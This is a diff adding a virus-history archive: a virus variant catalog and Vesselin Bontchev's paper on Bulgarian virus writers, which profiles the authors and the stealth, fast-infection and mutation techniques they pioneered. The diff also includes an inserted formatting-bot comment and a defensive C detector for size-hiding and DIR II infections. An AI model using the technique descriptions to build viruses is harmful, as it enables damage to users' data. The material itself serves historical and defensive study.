+ +@BULLET = There is a version of Brain with VIRUS_SHOE +RECORD v9.0 which is incapable of activating a virus +stored on hard disk due to the drive number being +hardwired into the read routine for loading the virus. +v9.1 may be the hard disk variant of Brain. + + + + Clone-B + +This is the Clone virus that has been modified to +corrupt the FAT when it is booted after May 5, 1992. +There are no other apparent modifications. + + + + Jork Virus + +This virus is the Shoe_virus with the identifying text +at offset 0010hex reduced to "Welcome to the Dungeon +(c) 1986 Brain", with the text at 0202hex reading "(c) +1986 Jork & Amjads (pvt) Ltd". + + + + Terse Shoe Virus + +This is a variant of the Shoe-virus with the initial +text message truncated to a single line. + +end of text. Prepared 12/7/89 + \ No newline at end of file diff --git a/textfiles.com/virus/bulgfact.txt b/textfiles.com/virus/bulgfact.txt new file mode 100644 index 00000000..a60ec727 --- /dev/null +++ b/textfiles.com/virus/bulgfact.txt 
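Review bot: two import artifacts in this hunk need a decision on archive policy before merging: the "@BULLET = " prefixes on the Shoe_virus-B items are word-processor markup that never rendered as bullets, and the file ends with "\ No newline at end of file". If the repository keeps text files byte-for-byte, both are fine and should be left alone; if it normalizes, strip the @BULLET prefixes and add the trailing newline in the same commit so the history shows one clean import. Either way the NCSA notice in the header ("may not be reproduced without attribution") is the reason the contact block at the top must stay in place.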
@@ -0,0 +1,2212 @@ + + + The Bulgarian and Soviet Virus Factories + + ======================================== + + + + Vesselin Bontchev, Director + + Laboratory of Computer Virology + + Bulgarian Academy of Sciences, Sofia, Bulgaria + + + + + +0) Abstract + +=========== + + + +It is now well known that Bulgaria is leader in computer virus + +production and the USSR is following closely. This paper tries to + +answer the main questions: Who makes viruses there, What viruses are + +made, and Why this is done. It also underlines the impact of this + +process on the West, as well as on the national software industry. + + + +1) How the story began + +====================== + + + +Just three years ago there were no computer viruses in Bulgaria. + +After all, these were things that can happen only in the capitalist + +countries. They were first mentioned in the April issue of the + +Bulgarian computer magazine "Komputar za vas" ("Computer for you") + +[KV88] in a paper, translated from the German magazine "Chip" [Chip]. + +Soon after that, the same Bulgarian magazine published an article + +[KV89]], explaining why computer viruses cannot be dangerous. The + +arguments presented were, in general, correct, but the author had + +completely missed the fact that the majority of PC users are not + +experienced programmers. + + + +A few months later, in the fall of the same year, two men came in the + +editor's office of the magazine and claimed that they have found a + +computer virus. Careful examination showed that it was the VIENNA + +virus. + + + +At that time the computer virus was a completely new idea for us. To + +make a computer program, whose performance resembles a live being, is + +able to replicate and to move from computer to computer even against + +the will of the user, seemed extremely exciting. + + + +The fact that "it can be done" and that even "it had been done" + +spread in our country like wildfire. 
Soon hackers obtained a copy of + +the virus and began to hack it. It was noticed that the program + +contains no "black magic" and that it was even quite sloppily + +written. Soon new, home--made and improved versions appeared. Some of + +them were produced just by assembling the disassembly of the virus + +using a better optimizing assembler. Some were optimized by hand. As + +a result, now there are several versions of this virus, that were + +created in Bulgaria --- versions with infective lengths of 627, 623, + +622, 435, 367, 353 and even 348 bytes. The virus has been made almost + +two times shorter (its original infective length is 648 bytes) + +without any loss of functionality. + + + +This virus was the first case. Soon after that, we were "visited" by + +the CASCADE and the PING PONG viruses. The later was the first + +boot--sector virus and proved that this special area, present on + +every diskette can be used as a virus carrier, too. All these three + +viruses were probably imported with illegal copies of pirated + +programs. + + + +2) Who, What & Why. + +=================== + + + +2.1) The first Bulgarian virus. + +------------------------------- + + + +At that time both known viruses that infected files ( VIENNA and + +CASCADE) infected only COM files. This made me believe that the + +infection of EXE files was much more difficult. Unfortunately, I made + +the mistake by telling my opinion to a friend of mine. Let's call him + +"V.B." for privacy reasons.(1) + +................................................................... + +[(1) These are the initials of his true name. It + +will be the same with the other virus writers that I shall mention. + +Please note, that while I have the same initials (and even his full + +name resembles mine), we are two different persons.] + +................................................................... 
+ +The challenge was taken immediately and soon after that I received a + +simple virus that was able to infect only EXE files. It is now known + +to the world under the name of OLD YANKEE. The reason for this is + +that when the virus infects a new file, it plays the "Yankee Doodle" + +melody. + + + +The virus itself was quite trivial. Its only feature was its ability + +to infect EXE files. The author of this virus even distributed its + +source code (or, more exactly, the source code of the program that + +releases it). Nevertheless, the virus did not spread very widely and + +even had not been modified a lot. Only a few sites reported to be + +infected by it. Probably the reason for this was the fact, that the + +virus was non--resident and that it infected files only on the + +current drive. So the only possibility to get infected by it was to + +copy an infected file from one computer to another. + + + +When the puzzle of creating a virus which is able to infect EXE files + +was solved, V.B. lost his interest in this field and didn't write any + +other viruses. As far as I know, he currently works in real--time + +signal processing. + + + +2.2) The T.P. case. + +------------------- + + + +The second Bulgarian virus--writer, T.P., caused much more trouble. + +When he first heard the idea about aself--replicating program, he was + + very interested, decided to writehis own virus, and he succeeded. + +Then he tried to implement a virus protection scheme and succeeded + +again. The next move was to improve his virus to bypass his own virus + +protection, then to improve the virus protection and so on. That is + +why there are currently about 50 different versions of his viruses. + + + +Unfortunately, several of them (about a dozen) were quite + +"successful." They spread world--wide. There are reports about them + +from all countries of the former Eastern block, as well as from the + +USA and West Europe. 
+ + + +Earlier versions of these TP viruses are known under the name + +VACSINA, because they contain such a string. In fact, this is the + +name of the virus author's virus protection program. It is + +implemented as a device driver with this name. The virus merely tries + +to open a file with this name, which means "Hey, it's me, let me + +pass." + + + +The latest versions of the virus are best known under the name YANKEE + +DOODLE, because they play this tune. The conditions on which the tune + +is played are different with the different versions of the virus --- + +for instance when the user tries to reboot the system, or when the + +system timer reaches 5 p.m. + + + +All TP viruses are strictly non--destructive. Their author payed + +particular attention not to destroy any data. For instance, the virus + +does not infect EXE files for which the true file length and the + +length of the loadable part as it is present in the EXE header, are + +not equal. As far as I know, no other virus that is able to infect + +EXE files works this way. + + + +Also, the virus does not try to bypass the resident programs that + +have intercepted INT 13h, therefore it takes the risk to be detected + +by most virus activities monitoring software. The author of the virus + +obviously could circumvent it --- for instance it uses a clever + +technique, now known as "interrupt tracing" to bypass all programs + +that have hooked INT 21h. The only reason for not bypassing INT 13h + +as well, is that this would also bypass all disk casheing programs, + +thus it could cause damage. + + + +Of course, the fact that the virus is not intentionally destructive + +does not mean that it does not cause any damage. There are several + +reports of incompatibilities with other software; or of panicking + +users, that have formatted their disks; or, at least, damage caused + +by time loss, denial of computer services, or expenses removing the + +virus. 
It is well known, that "there ain't no such thing as a good + +virus." + + + +The TP viruses were not spread intentionally; the cause could be + +called "criminal negligence." The computer used by T.P. to develope + +his viruses was also shared by several other people. This is common + +practice in Bulgaria, where not everyone can have a really "personal" + +computer to work with. T.P. warned the other users that he is writing + +viruses, but at this time computer viruses were a completely new + +idea, so nobody took the warning seriously. Since T.P. didn't bother + +to clean up after himself, these users got, of course, infected. + +Unintentionally, they spread the infection further. + + + +When asked about the reason of writing viruses, T.P. replied that he + +did this in order to try several new ideas; to better learn the + +operating system and several programming tricks. He is not interested + +in this field any more --- he has stopped writing viruses about two + +years ago. + + + +2.3) The Dark Avenger. + +---------------------- + + + +In the spring of 1989 a new virus appeared in Bulgaria. It was + +obviously "home--made" and just to remove any doubts about it, there + +was a string in it, saying "This program was written in the city of + +Sofia (C) 1988-89 Dark Avenger." + + + +The virus was incredibly infectious --- when it was in memory, it was + +sufficient to copy or just to open a file to get it infected. When + +the user felt that there is a virus in his/her system and, without + +booting from a non--infected write--protected system diskette, ran an + +anti--virus program which wasn't aware of this new virus, he usually + +got all his/her executable files infected. + + + +The idea of infecting a file when it is opened was new and really + +"successful." Now such viruses are called "fast infectors." This + +strategy helped the virus to spread world-- wide. 
There are reports from all European countries, from the USA, the USSR, even from Thailand and Mongolia.

On top of this, the virus was very dangerously destructive. On every 16th run of an infected program, it overwrote a sector at a random place on the disk, thus possibly destroying the file or directory that contained that sector. The contents written to the sector were the first 512 bytes of the virus body, so even after a system had been cleaned up, there were files containing the string "Eddie lives...somewhere in time!" This caused much more damage than if the virus had simply formatted the hard disk, since the destruction was very unnoticeable, and by the time the user eventually discovered it, his backups probably already contained corrupted data.

Soon after that, other clever viruses began to appear. Almost all of them were very destructive. Several contained completely new ideas. This person (we still cannot identify him exactly) is now believed to be the author of the following viruses:

DARK AVENGER, V2000 (two variants), V2100 (two variants), 651, DIAMOND (two variants), NOMENKLATURA, 512 (six variants), 800, 1226, PROUD, EVIL, PHOENIX, ANTHRAX, LEECH...

Dark Avenger has several times attacked some anti-virus researchers personally. The V2000/V2100 viruses claim to be written by "Vesselin Bontchev" and in fact hang the computer when any program containing this string is run. A slightly modified variant of V2100 (V2100-B) has been used to trojanize version 66 of John McAfee's package VIRUSCAN.

There are reports that Dark Avenger has called several bulletin board systems in Europe and has uploaded viruses there. The reports come from the UK, Sweden, the Netherlands, Greece... Sometimes the viruses uploaded there are unknown in Bulgaria (NOMENKLATURA, ANTHRAX).
But they are obviously made in our country: they contain messages in Cyrillic. Sometimes Dark Avenger uploads a Trojan program that spreads the virus, not just an infected program. This makes the detection of the source of an infection more difficult.

In one particular case he uploaded a file called UScan which, when run, claimed to be the "universal virus scanner" written by Vesselin Bontchev. Even the person who uploaded it had logged in under the name "Vesselin Bontchev." In fact, the program just infected all the files it scanned with the ANTHRAX virus.

While the other Bulgarian virus writers seem to be merely irresponsible or childish, the Dark Avenger can be classified as a "technopath." He is a regular user of several Bulgarian bulletin board systems, so one can easily exchange e-mail messages with him. When asked why his viruses are destructive, he replied that "destroying data is a pleasure" and that he "just loves to destroy other people's work."

Unfortunately, no measures can be taken against him in Bulgaria. Since there is no law on information protection, his activities are not illegal there. He could easily be caught by tapping the phones of the BBSes he uses, but the law enforcement authorities cannot take such measures, since there is no evidence of illegal activity. Alas, he knows this perfectly well.

2.4) Lubo & Ian.
----------------

Some of the Dark Avenger's viruses proved to be very "successful" and caused real epidemics. That is why they were often imitated by other virus writers who lacked the imagination to design their own virus but were jealous of Dark Avenger's fame. So they just disassembled his viruses (usually the first one) and used parts of them, sometimes without even understanding their purpose. Such is the case with the MURPHY viruses.
According to a string in them, they were written by "Lubo & Ian, USM Laboratory, Sofia." These people do exist and have used their real names. "Lubo" has even been interviewed several times by newspaper reporters.

They claim that the virus was written for vengeance. They had done some important work for their boss and the latter refused to pay them. That is why they developed the virus in one night and released it. The fact that the virus would spread outside the laboratory just didn't occur to them. However, this does not explain the development of the other versions of the same virus (there are at least four variants). Nevertheless, it proves one more time that it is better (and safer, too) to pay good programmers well...

Besides MURPHY, these two virus writers have created another virus, called SENTINEL (5 variants). The only unusual thing about this virus is that it is written in a high-level programming language (Turbo PASCAL), yet it is not an overwriting or companion virus, as most HLL viruses are. It is able to infect COM and EXE files by appending itself to them while preserving their full functionality. It is also memory resident, hides the file length increase when the user issues the DIR command, and even mutates.

2.5) The virus writer from Plovdiv.
-----------------------------------

This man, P.D., claimed that he had written viruses "for fun" and only "for himself," and that he "never releases them." Unfortunately, at least two of them have "escaped" by accident. These are the ANTI-PASCAL605 and the TERROR viruses. The latter in particular is extremely virulent and caused a large epidemic in Bulgaria.

P.D. was very sorry about that and submitted samples of all his viruses to the anti-virus researchers, so that the respective anti-virus programs could be developed, just in case some of these viruses escaped too.
These viruses turned out to be quite a few, ranging from extremely stupid to very sophisticated. Here are some of them:

XBOOT, ANTIPASCAL (5 variants), TINY (11 variants), MINIMAL-45, TERROR, DARK LORD, NINA, GERGANA, HAPPY NEW YEAR (2 variants), INT 13.

P.D. claims that the DARK LORD virus (a minor TERROR variant) was not written by him. The TINY family has nothing to do with the Danish TINY virus (the 163-byte variant of the KENNEDY virus); it, like the MINIMAL-45 virus, was written with the sole purpose of making the shortest virus in the world.

P.D. is no longer writing viruses, because "it is so easy that it is not interesting," in his own words. He is currently writing anti-virus programs, and rather good ones.

2.6) The two guys from Varna.
-----------------------------

They are two pupils (V.P. and S.K.) from the Mathematical High School in Varna (a town on the Black Sea). They have developed several viruses and continue to do so, producing more and more sophisticated ones. Furthermore, they intentionally spread their viruses, usually releasing them on the school's computers or in the Technical University in Varna. When asked why they write and release viruses, they reply "because it's so interesting!"

The viruses written by them are: MG (5 variants), SHAKE (5 variants), DIR and DIR II. All of them are memory resident and infect files when the DIR command is performed.

The last one is an extremely virulent and sophisticated virus, as sophisticated as THE NUMBER OF THE BEAST. It is also a completely new type of virus: it infects neither boot sectors nor files. Instead, it infects the file system as a whole, changing the information in the directory entries so that each file seems to begin with the virus.

There is a counter of the number of infected systems in the virus body.
There is evidence that V.P. and S.K. collect infected files, copy the contents of the counter and then plot curves of the spread of the infection, checking them against the normal distribution. They are doing this "for fun."

2.7) W.T.'s case.
-----------------

W.T. is a virus writer from Sofia who has written two viruses: WWT (2 variants) and DARTH VADER (4 variants). In his own words, he did so to test a new idea and to gain access to the Virus eXchange BBS (see below).

The new idea consisted of a virus (DARTH VADER) that does not increase file lengths, because it searches for unused holes filled with zeros and writes itself there. Also, the virus does not perform any write operations itself. Instead, it just waits for a COM file to be written to by DOS and modifies the file's image in memory just before the write operation is performed.

W.T. does not write viruses any more, but he is still extremely interested in this field. He collects sophisticated viruses and disassembles them, looking for clever ideas.

2.8) The Naughty Hacker.
------------------------

This virus writer, M.H., is a pupil and also lives in Sofia. He has written several viruses, most of which contain the string "Naughty Hacker" in their body. All of them are non-destructive, but contain different video effects, from display desynchronization to a bouncing ball.

Currently, at least 8 different variants have been isolated, but it is believed that even more exist and are spreading in the wild. It is also believed that M.H. continues to produce viruses. As usual, he is doing so "because it is interesting" and "for fun."

He is also the author of three simple boot sector viruses (BOOTHORSE and two others that are still unnamed).

2.9) Other known virus writers.
-------------------------------

The persons listed above are the major Bulgarian virus producers.
However, they are not alone. Several other people in Bulgaria have written at least one virus (sometimes more). In fact, making a virus is currently considered there a kind of sport, or a practical joke, or a means of self-assertion.

Some of these virus writers have supplied their creations directly to the anti-virus researchers, as if they were waiting for a reward. This happens quite often; probably they expect that the anti-virus researcher, as the best qualified person, will evaluate their creation best. Sometimes the fact that their virus becomes known, is described, and is included in the best anti-virus programs is sufficient for these people, and they don't bother to really spread their virus in the wild. So, probably the main reason for these people to produce viruses is the pursuit of glory, fame, and self-assertion.

Such known Bulgarian virus writers (with the respective names of their viruses given in parentheses) are V.D. from Pleven (MICRO-128), A.S. and R.D. from Mihajlovgrad (V123), I.D. from Trojan (MUTANT, V127, V270x), K.D. from Tutrakan (BOYS, WARRIER, WARRIOR, DREAM), and others.

2.10) Unknown Bulgarian virus writers.
--------------------------------------

Of course, there are also other virus writers who are not known to the author of this paper. Sometimes it is possible to determine the town where the viruses were developed, usually due to an appropriate string in the virus body, or because the virus wasn't found elsewhere. Some of the viruses are very simple, others are quite sophisticated. Here are examples of such viruses.

- The KAMIKAZE virus has been detected only in the Institute of Mathematics at the Bulgarian Academy of Sciences, Sofia, and was probably made there;

- The RAT virus, made in Sofia, as is written in its body;

- The VFSI (HAPPY DAY) virus was developed in the Higher Institute of Finances and Economics in Svishtov (a small town on the Danube) by an unknown programmer;

- The DESTRUCTOR virus, probably made in Plovdiv, where it was first detected;

- The PARITY virus, probably written in the Technical University, Sofia, since it has not been detected elsewhere;

- The TONY file and boot sector viruses, probably created in Plovdiv, where they were first detected;

- The ETC virus, detected only in Sofia;

- The 1963 virus, a quite sophisticated one, probably made in Sofia University;

- The JUSTICE virus.

2.11) The Virus eXchange BBS.
-----------------------------

About a year ago, virus writing in Bulgaria entered a new phase. The virus writers began to organize themselves. The first step was the creation of a specialized bulletin board system (BBS) dedicated to virus exchange: the Virus eXchange BBS.

Its system operator (SysOp), T.T., is a student of computer science at Sofia University. He has set up the BBS in his own home. On this BBS there are two major kinds of files: anti-virus programs and viruses. The anti-virus programs can be downloaded freely.

In order to get access to the virus area, one has to upload a new virus. However, anyone who uploads a new virus gets access to the whole virus collection. S/He can then download any virus that is already available, or even all of them. No questions are asked, for instance about the reason s/he might need these viruses.

Furthermore, the SysOp takes no steps to verify the identity of his users.
They are allowed to use fake names and are even encouraged to do so. Dark Avenger and W.T. are, between them, the most active users, but there are also names like George Bush from New York, Saddam Hussein from Baghdad, Ozzy Ozburn and others.

Since this BBS already has a large collection of computer viruses (about 300), it is quite difficult to find a new virus for it. If one badly wants access to the virus area, it is much simpler to write a new virus than to try to find one. That is exactly what W.T. did. Therefore, this BBS encourages virus writing.

Furthermore, on this BBS there are all kinds of viruses. Some of them, such as 1260, V2P6Z, FLIP and WHALE, are considered extremely dangerous, since they use several new ideas and clever tricks which make them very difficult to recognize and to remove from infected files. And the Virus eXchange BBS policy makes all these viruses freely available to any hacker who bothers to download them. This will undoubtedly lead to the creation of more and more such "difficult" viruses in the near future.

The free availability of live viruses has already borne bitter fruit. It has helped viruses created far away from Bulgaria and not widely spread to cause epidemics in our country. Such was the case of the DATALOCK virus. It was created in California, USA, and uploaded to the Virus eXchange BBS. A few weeks later it was detected in the Technical University, Sofia. Probably one of the users of the BBS had downloaded it from there and spread it "for fun." In a similar way the INTERNAL, TYPO and 1575 viruses entered our country.

But the free availability of known live viruses is not the most dangerous thing. After all, since they are already known, there already exist programs to detect and probably to remove them.
Much more dangerous is the free availability on this BBS of virus source code! Indeed, original source code or well-commented disassemblies of several viruses are freely available on the Virus eXchange BBS, just like any other live virus. To name a few, there are:

DARK AVENGER, OLD YANKEE, DIAMOND, AMSTRAD, HYMN, MLTI830, MURPHY, MAGNITOGORSK, ICELANDIC, MIX1, STONED, JERUSALEM, DATACRIME, BURGER, ARMAGEDON, OROPAX, DARTH VADER, NAUGHTY HACKER, 512, VIENNA, 4096, FISH#6, PING PONG, BLACK JEC, WWT, MG, TSD, BOOTHORSE, BAD BOY, LEECH...

Most of them are perfectly assemblable sources.

The publishing of virus source code has proven to be the most dangerous thing in this field. The VIENNA, JERUSALEM, CASCADE and AMSTRAD viruses are the best examples. Their source code was made publicly available, which led to the creation of scores of new variants of these viruses. The known variants of these four viruses alone make up about 20 % of all known viruses, which means more than a hundred variants. One can imagine the consequences of making publicly available the source code of all the viruses listed above. In less than a year we will probably be submerged by thousands of new variants...

In fact, this process has already begun. The HIV, MIGRAM, KAMASYA, CEMETERY and ANTICHRIST viruses were obviously created by someone who had access to the source of the MURPHY virus. The ENIGMA virus is clearly based on the OLD YANKEE code. There have been reports of infections with these viruses in an Italian school, and an Italian virus writer known as Cracker Jack is a user of Virus eXchange...

The damage caused by this BBS alone to the rest of the world is big enough. But this is not all.
Since possession of "viral knowledge" (i.e., live viruses, virus source code) has always tempted hackers, and since the legitimate anti-virus researchers usually exchange such things only among themselves and in a very restricted manner, it is not surprising that similar "virus boards" have begun to pop up around the world. There are currently such BBSes in the USA, Germany, Italy, Sweden, Czechoslovakia, the UK and the Soviet Union. Stopping their activities is very difficult in legal terms, because the possession, storage or wilful downloading of computer viruses is usually not considered a criminal offence. And it shouldn't be; otherwise the anti-virus researchers themselves would have no way to exchange virus samples to work with.

The creation of a virus-oriented BBS whose system operator supported the writing, spreading and exchanging of virus code didn't go unnoticed in Bulgaria. Almost all virus writers have obtained a modem (not a very easy thing in Bulgaria) and contacted it. Afterwards, they began to contact each other by means of electronic messages on this BBS. They have even created a specialized local conference (local to Bulgaria) in order to keep in touch and to exchange ideas on how to write clever viruses. Therefore, they have begun to organize themselves, a thing that cannot be said of the anti-virus research community in all countries...

3) New ideas.
=============

As can be seen from the examples above, the whole of Bulgaria has turned into some kind of computer virus development laboratory, where any capable (or not so capable) pupil/student/programmer is tempted to write his own virus and to test it in the wild. It is therefore not unusual that several completely new ideas were first developed in our country. I shall try to enumerate here some (only the most important) of them.
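
Two of the ideas enumerated below, the CHKDSK cross-check that exposes semi-stealth viruses (already met above in the description of SENTINEL, which hides the file length increase from DIR) and the DIR II infection of directory entries, reduce to a little file-system arithmetic. The following C program is an added example for this edition; it is not code from the paper, from CHKDSK, or from the viruses named. It builds a small FAT16-style root directory and FAT in memory (constructed data, not a real disk), walks each file's cluster chain to compare the space actually allocated with the size recorded in the entry, and looks for executables whose directory entries all start at the same cluster, which is how every program "seems to begin with the virus." The cluster size, the FAT width and the sample file names are assumptions made for the example; the directory entry offsets (name at 0, attribute at 11, first cluster at 26, size at 28) are the standard FAT layout.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BPC   512   /* bytes per cluster in the constructed image (assumption) */
#define NFAT  32    /* clusters the constructed FAT describes */
#define NENT  8     /* slots in the constructed root directory */
#define EOC   0xFFFF

typedef struct { char name[12]; uint8_t attr; uint16_t first; uint32_t size; } dirent_t;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | ((uint16_t)p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }

/* Decode one 32-byte directory entry. Returns 0 for an unused or deleted slot. */
int parse_dirent(const uint8_t *e, dirent_t *d)
{
    if (e[0] == 0x00 || e[0] == 0xE5) return 0;
    memcpy(d->name, e, 11); d->name[11] = '\0';
    d->attr = e[11]; d->first = rd16(e + 26); d->size = rd32(e + 28);
    return 1;
}

/* Clusters in the chain starting at `start`, following the FAT until an
 * end-of-chain mark (>= 0xFFF8). A visited bitmap stops looped chains;
 * a cluster below 2 or past the FAT ends the walk. */
unsigned chain_length(const uint16_t *fat, unsigned nfat, uint16_t start)
{
    uint8_t seen[NFAT] = {0};
    unsigned n = 0; uint16_t c = start;
    if (nfat > NFAT) nfat = NFAT;
    while (c >= 2 && c < nfat && !seen[c]) {
        seen[c] = 1; n++;
        c = fat[c];
        if (c >= 0xFFF8) break;
    }
    return n;
}

/* Check 1, what CHKDSK does: clusters allocated minus clusters the recorded
 * size needs. 0 is consistent; positive means more space is chained than the
 * length accounts for, the signature of a shrunken (semi-stealth) length. */
int allocation_excess(const uint16_t *fat, unsigned nfat, const dirent_t *d)
{
    unsigned needed = (unsigned)((d->size + BPC - 1) / BPC);
    return (int)chain_length(fat, nfat, d->first) - (int)needed;
}

static int is_executable(const dirent_t *d)
{
    return memcmp(d->name + 8, "COM", 3) == 0 || memcmp(d->name + 8, "EXE", 3) == 0;
}

/* Check 2, the DIR II pattern: the first cluster shared by the largest number
 * of executable entries. Returns that count and stores the cluster; 2 or more
 * means several programs all "begin" at the same place on disk. */
int shared_start_cluster(const dirent_t *d, int n, uint16_t *cluster)
{
    int best = 0; *cluster = 0;
    for (int i = 0; i < n; i++) {
        if (!is_executable(&d[i]) || d[i].first < 2) continue;
        int cnt = 0;
        for (int j = 0; j < n; j++)
            if (is_executable(&d[j]) && d[j].first == d[i].first) cnt++;
        if (cnt > best) { best = cnt; *cluster = d[i].first; }
    }
    return best;
}

/* ---- constructed sample image: not a real disk ---- */
static void set_entry(uint8_t *e, const char *name11, uint16_t first, uint32_t size)
{
    memset(e, 0, 32); memcpy(e, name11, 11); e[11] = 0x20;        /* archive bit */
    e[26] = (uint8_t)first; e[27] = (uint8_t)(first >> 8);
    for (int i = 0; i < 4; i++) e[28 + i] = (uint8_t)(size >> (8 * i));
}
static void set_chain(uint16_t *fat, uint16_t first, unsigned n)
{
    for (unsigned i = 0; i < n; i++) fat[first + i] = (i + 1 < n) ? (uint16_t)(first + i + 1) : EOC;
}
void build_sample(uint8_t dir[NENT * 32], uint16_t fat[NFAT])
{
    memset(dir, 0, NENT * 32); memset(fat, 0, NFAT * sizeof fat[0]);
    fat[0] = 0xFFF8; fat[1] = 0xFFFF;                               /* reserved entries */
    set_entry(dir + 0 * 32, "FOO     COM", 2, 1200); set_chain(fat, 2, 3);  /* consistent */
    set_entry(dir + 1 * 32, "NOTES   TXT", 5, 100);  set_chain(fat, 5, 1);  /* consistent */
    set_entry(dir + 2 * 32, "HIDDEN  COM", 8, 1200); set_chain(fat, 8, 4);  /* size shrunk */
    set_entry(dir + 3 * 32, "EDIT    COM", 20, 900);                        /* DIR II: both */
    set_entry(dir + 4 * 32, "GAME    EXE", 20, 2000); set_chain(fat, 20, 2); /* start at 20 */
    dir[5 * 32] = 0xE5;                                             /* deleted slot */
}

/* Walk the directory, print the findings, return the number of anomalies. */
int scan_directory(const uint8_t *dir, int nent, const uint16_t *fat, unsigned nfat)
{
    dirent_t d[NENT]; int n = 0, anomalies = 0; uint16_t c;
    for (int i = 0; i < nent && n < NENT; i++)
        if (parse_dirent(dir + i * 32, &d[n])) n++;
    for (int i = 0; i < n; i++) {
        int excess = allocation_excess(fat, nfat, &d[i]);
        if (excess) {
            printf("%s: size %u needs %u cluster(s), chain differs by %+d\n", d[i].name,
                   (unsigned)d[i].size, (unsigned)((d[i].size + BPC - 1) / BPC), excess);
            anomalies++;
        }
    }
    int shared = shared_start_cluster(d, n, &c);
    if (shared >= 2) { printf("%d executables start at cluster %u\n", shared, c); anomalies++; }
    return anomalies;
}

/* Returns 1 when the constructed image yields exactly the expected findings. */
int self_check(void)
{
    uint8_t dir[NENT * 32]; uint16_t fat[NFAT]; dirent_t d, all[NENT]; uint16_t c; int n = 0;
    build_sample(dir, fat);
    if (chain_length(fat, NFAT, 2) != 3 || chain_length(fat, NFAT, 8) != 4) return 0;
    if (!parse_dirent(dir + 2 * 32, &d) || allocation_excess(fat, NFAT, &d) != 1) return 0;
    if (parse_dirent(dir + 5 * 32, &d) != 0) return 0;
    for (int i = 0; i < NENT; i++) if (parse_dirent(dir + i * 32, &all[n])) n++;
    if (n != 5 || shared_start_cluster(all, n, &c) != 2 || c != 20) return 0;
    return scan_directory(dir, NENT, fat, NFAT) == 3;   /* HIDDEN, GAME, shared cluster */
}

int main(void)
{
    uint8_t dir[NENT * 32]; uint16_t fat[NFAT];
    build_sample(dir, fat);
    return scan_directory(dir, NENT, fat, NFAT) && self_check() ? 0 : 1;
}
```

On a real volume the same two functions would be fed the raw root directory and the first FAT copy; FAT12 packs its entries in 12 bits and needs a different reader, which this example does not include.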

- The interrupt tracing technique, capable of finding the original handler (in DOS or BIOS) of any interrupt vector, was first implemented in the YANKEE DOODLE (TP) viruses. Later, other viruses in the world began to use it (4096, NAUGHTY HACKER).

- The "fast infectors," viruses that infect on file opening or even on any file operation, were first developed in Bulgaria. The first such virus was the DARK AVENGER. Now there are a lot of fast infectors. One of them, 1963, even infects on file deletion.

- The "semi-stealth" viruses, viruses that hide the increase in size of the infected files (the 651 virus) or that remove themselves from the infected files when one loads them with a debugger (YANKEE DOODLE), are both viruses made in our country.

- Hiding the true file length usually causes problems, because CHKDSK is able to detect the difference between the disk space marked as used in the FAT and the reported file length. Only two viruses in the world, both Bulgarian, are able to handle this problem: DIAMOND and V2100.

- The first really "stealth" file infector, the 512 virus, was Bulgarian. It is true, however, that the idea was discovered independently at almost the same time in other parts of the world (the 4096 virus from Israel).

- The only known stealth parasitic virus whose "stealth" features go down to the BIOS level (i.e., it cannot be detected while active in memory even if the infected file is read at sector rather than file level) is the Bulgarian INT13 virus.

- One of the first multi-partite viruses (viruses that are able to infect both files and boot sectors), the ANTHRAX virus, was developed in Bulgaria. It is true, however, that similar ideas can be noticed in the 4096 and GHOST BALLS viruses, which were developed much earlier.
  Also, other multi-partite viruses (VIRUS-101, V-1, FLIP, INVADER) were created independently at almost the same time (or even earlier) in other parts of the world.

- The idea first used in the LEHIGH virus, placing the virus body in an unused part of the file COMMAND.COM, has been developed further by several Bulgarian viruses. They can all infect any COM or EXE file (unlike the LEHIGH virus) in the usual way, but when they infect the command interpreter, they place themselves in an area filled with zeros at the end of the file, and thus in this case do not increase its length. Such viruses are TERROR, NAUGHTY HACKER and others.

- The method mentioned above has been developed even further by other Bulgarian viruses. Their authors noticed that any sufficiently large area of zeros in any file (not just COMMAND.COM) can be used to hide the virus body. The viruses that use this method are again of Bulgarian origin: PROUD, EVIL, PHOENIX, RAT, DARTH VADER... The last of these does not even write to the infected files itself; it leaves this task to DOS. And the RAT virus hides itself in the unused part of EXE file headers.

- One of the extremely mutating viruses is the Dark Avenger's virus LEECH. It can exist in more than 4.5 billion variants. It is true, however, that this is neither the first entirely mutating virus (1260 being the first), nor does it have the most flexible mutating mechanism (it is much simpler than V2P6Z).

- A completely new type of computer virus (DIR II) was developed by two Bulgarian pupils. This virus infects neither files nor boot sectors. Instead, it infects file systems as a whole, or more exactly, directory entries.

- Different tricks to get control without directly hooking the INT 21h vector were developed by several Bulgarian virus writers.
  The TERROR virus places a JMP instruction to its body in the original INT 21h handler in DOS. The viruses from the PHOENIX family (800, 1226, PROUD, EVIL, PHOENIX) hook an interrupt that is called by DOS on every file-related function (INT 2Ah, AH=82h). The DIR II virus patches itself into the chain of DOS disk device drivers.

- The first virus that is able to infect device drivers (SYS files only) is, of course, Bulgarian. This is the HAPPY NEW YEAR (1600) virus.

- The first fully functional parasitic virus written entirely in a high-level language (Turbo PASCAL) is the Bulgarian virus SENTINEL.

- The Bulgarian virus ANTHRAX is the first virus that is resident in memory only temporarily. It removes itself from memory after it has infected the first file and then acts as a non-resident virus.

- The shortest memory resident virus in the IBM PC world, only 128 bytes, was again developed in Bulgaria. There are reports of a 108-byte resident virus, also from there, but they are unconfirmed as yet.

- The shortest virus in the IBM PC world, only 45 bytes long, is the Bulgarian virus MINIMAL-45. It seems possible, however, to shorten it even further, to 31 bytes, with a big loss of reliability.

4) Why so many viruses are created in Bulgaria.
===============================================

Computer viruses are created in all parts of the world, not only in Bulgaria. However, the proportion of them that are created in our country is extremely high. Therefore, while in the whole world there exist preconditions that make virus writing tempting, in Bulgaria there exist specific conditions as well.

4.1) Specific reasons for virus writing in Bulgaria.
----------------------------------------------------

4.1.1)

The first, and most important of all, is the existence of a huge army of young and extremely qualified people, computer wizards, who are not actively involved in economic life.

Computerization in Bulgaria began without economic reasons. Since our country was a socialist one, its economy was of an administrative type. The economy didn't need to be computerized. In fact, computers and a planned economy are quite incompatible: computers help you to produce more in less time and with less effort and money, while the goal of a manager in a planned economy is to fulfil the plan exactly as it is given, in no more and no less time, and with no more and no less money. However, the communist party leaders in Bulgaria decided that we should computerize, mainly in order to be able to supply computers to the Soviet Union and circumvent the embargo.

